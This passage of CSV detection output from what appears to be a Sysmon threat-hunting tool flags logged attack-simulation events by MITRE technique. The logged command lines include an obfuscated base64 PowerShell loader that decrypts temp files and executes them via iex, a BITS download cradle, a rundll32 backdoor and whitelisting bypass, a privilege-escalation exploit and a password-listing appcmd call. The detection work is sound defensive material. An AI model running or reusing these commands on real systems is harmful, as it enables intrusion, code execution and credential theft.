JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 4895 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:03.695 747F3D96-660F-5D3F-0000-00106B508600 6720 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-660F-5D3F-0000-001055378600 2948 C:\Windows\System32\cmd.exe cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," 1 5 4 1 0 0x8000000000000000 4895 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:03.695 747F3D96-660F-5D3F-0000-00106B508600 6720 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-660F-5D3F-0000-001055378600 2948 C:\Windows\System32\cmd.exe cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 112815 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-07 13:13:02.476 747F3D96-095E-5EB4-0000-0010D46F1800 5216 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "c:\Windows\System32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-08F7-5EB4-0000-0020BAEC0200 0x2ecba 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-095E-5EB4-0000-001002511800 6396 C:\Windows\System32\changepk.exe "C:\Windows\system32\ChangePk.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," 1 5 4 1 0 0x8000000000000000 4895 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:03.695 747F3D96-660F-5D3F-0000-00106B508600 6720 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-660F-5D3F-0000-001055378600 2948 C:\Windows\System32\cmd.exe cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 5950 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-04 10:16:49.960 747F3D96-B091-5D46-0000-001081F71104 820 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-B080-5D46-0000-0010D4EA0F04 2112 C:\Windows\System32\WSReset.exe "C:\Windows\system32\WSReset.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," 1 5 4 1 0 0x8000000000000000 339222 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-07-26 22:26:14.521 747F3D96-0306-5F1E-0000-0010E15F3100 3660 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-F938-5F1D-0000-0020E7030000 0x3e7 1 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-F938-5F1D-0000-00104B500000 584 C:\Windows\System32\winlogon.exe winlogon.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password ),1," 1 5 4 1 0 0x8000000000000000 5991 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:20.475 365ABB72-3D70-5CEB-0000-0010F2EDFF00 4012 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5452 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 12:08:23.391 747F3D96-7937-5D45-0000-00100D290801 4192 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-D4E9-5D45-0000-0020E7030000 0x3e7 1 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-7934-5D45-0000-0010CAB90701 7564 C:\Windows\System32\consent.exe consent.exe 896 272 00000280644BC500 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 112969 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-10 00:09:36.703 747F3D96-4640-5EB7-0000-0010EF364B01 372 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe c:\Windows\System32\cmd.exe c:\Users\IEUser\Tools\PrivEsc\ NT AUTHORITY\SYSTEM 747F3D96-3B92-5EB5-0000-0020E7030000 0x3e7 1 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-4640-5EB7-0000-0010292D4B01 8028 C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe NetworkServiceExploit.exe -i -c "c:\Windows\System32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243516 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.518 747F3D96-9F61-5E75-0000-00109B6C1E00 6620 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243516 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.518 747F3D96-9F61-5E75-0000-00109B6C1E00 6620 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1," 1 5 4 1 0 0x8000000000000000 16443 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:58:54.772 365ABB72-269E-5CD8-0000-001084F81A00 2728 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-268F-5CD8-0000-0010F4A51700 1256 C:\Python27\python.exe python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243516 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.518 747F3D96-9F61-5E75-0000-00109B6C1E00 6620 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16443 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:58:54.772 365ABB72-269E-5CD8-0000-001084F81A00 2728 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-268F-5CD8-0000-0010F4A51700 1256 C:\Python27\python.exe python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16443 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:58:54.772 365ABB72-269E-5CD8-0000-001084F81A00 2728 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium 